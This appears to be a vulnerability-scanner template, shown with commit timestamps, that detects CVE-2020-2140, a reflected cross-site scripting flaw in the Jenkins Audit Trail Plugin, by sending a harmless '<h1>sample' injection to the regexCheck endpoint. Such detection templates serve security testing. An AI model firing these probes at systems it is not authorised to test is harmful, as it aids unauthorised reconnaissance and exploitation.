2021-01-02 04:56:15 +00:00
id : CVE-2020-2140
2020-08-30 17:42:46 +00:00
info :
author : j3ssie/geraldino2
2020-08-31 07:38:04 +00:00
name : Jenkin AuditTrailPlugin XSS
2020-08-30 17:42:46 +00:00
severity : medium
2020-08-31 07:38:04 +00:00
description : Jenkins Audit Trail Plugin 3.2 and earlier does not escape the error message for the URL Patterns field form validation, resulting in a reflected cross-site scripting vulnerability.
2021-02-05 19:44:41 +00:00
reference : https://nvd.nist.gov/vuln/detail/CVE-2020-2140
tags : cve,cve2020,jenkins,xss
2020-08-31 07:38:04 +00:00
2020-08-30 17:42:46 +00:00
requests :
2020-08-31 07:38:04 +00:00
- method : GET
path :
2020-09-04 05:55:13 +00:00
- "{{BaseURL}}/descriptorByName/AuditTrailPlugin/regexCheck?value=*j%3Ch1%3Esample"
- "{{BaseURL}}/jenkins/descriptorByName/AuditTrailPlugin/regexCheck?value=*j%3Ch1%3Esample"
2020-08-31 07:38:04 +00:00
matchers-condition : and
matchers :
- type : word
2020-08-30 17:42:46 +00:00
words :
- <h1>sample
2020-08-31 07:38:04 +00:00
part : body
2020-12-13 19:24:23 +00:00
- type : word
words :
- "text/html"
part : header
2020-08-31 07:38:04 +00:00
- type : status
status :
- 200
